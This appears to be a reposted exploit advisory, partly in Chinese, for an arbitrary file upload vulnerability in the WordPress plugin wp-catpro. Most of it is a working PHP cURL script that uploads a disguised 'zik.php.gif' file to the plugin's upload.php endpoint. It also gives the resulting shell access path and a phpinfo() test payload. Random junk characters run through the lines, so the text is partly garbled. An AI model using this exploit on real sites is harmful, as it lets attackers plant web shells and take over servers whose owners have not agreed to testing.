Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability- k8 |1 h' c2 ^
#-----------------------------------------------------------------------# d; \# y! `! q* L! G8 {
8 }4 I$ A- m# r6 X' i
作者 => Zikou-16* E }# H) v. X* w& @1 w3 q: V5 D
邮箱 => zikou16x@gmail.com0 {( J. F1 p# I6 A$ A
测试系统 : Windows 7 , Backtrack 5r3# T% `5 X" d8 N: Z: f F0 {
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip+ I% t F1 b, l4 B4 _
####
; |3 a+ n; h2 |7 P" t: g
/ [, k; l- Q- i. A) z) e" F#=> Exploit 信息: J. S) B7 S( ~9 u
------------------4 N+ a! i: _; }7 P0 F
# 攻击者可以上传 file/shell.php.gif
1 H- s, [2 Q5 u" l# ("jpg", "gif", "png") // Allowed file extensions
! t& E; [+ t. f/ Y2 W. j% M# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
7 I9 s" C) O- B. ^, o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ w o, `8 M' F) p ?0 A( _4 V------------------
0 y7 @- k% F+ j# G6 q " H' B9 J3 w: _" P8 N. U; h2 C
#=> Exploit
+ v. R# `0 [8 Q-----------2 a- c$ B0 n7 p+ W. _& E
<?php
( U9 ]# P2 p1 W% y' z + g: g8 k: j$ ^- b4 Y* q$ ^ x7 r$ V
$uploadfile="zik.php.gif";' C( F5 J$ @! y2 H9 h( s2 o
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php"); _4 Q4 O) v5 X; D' s6 Z& e
curl_setopt($ch, CURLOPT_POST, true);. N" `# P: i) R. {7 u
curl_setopt($ch, CURLOPT_POSTFIELDS,, I- ^# q2 p5 f$ h4 k/ n) I
array('Filedata'=>"@$uploadfile",
- |$ U3 r7 H0 p m- }1 ?, U# P0 O'folder'=>'/wp-content/uploads/catpro/'));
* s9 r. p% B" B8 Xcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
~3 S9 V) L+ z. M! W n9 }$postResult = curl_exec($ch);* ?* n1 j$ i. }, c
curl_close($ch);4 H# [0 P9 e. k K' P! u
# C. w4 D6 N* F- u, E5 m$ B, n
print "$postResult";
! V$ k }( }0 B f
& M& S- w" Q0 _6 X, N0 P2 ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif: o; B" q( ?# o5 S" C, J( Q
?>7 q, D- }9 y6 i3 n0 x
<?php
" R7 P/ T1 w8 B$ s3 I! T/ Bphpinfo();
& E. i+ N2 d. c z& S?> |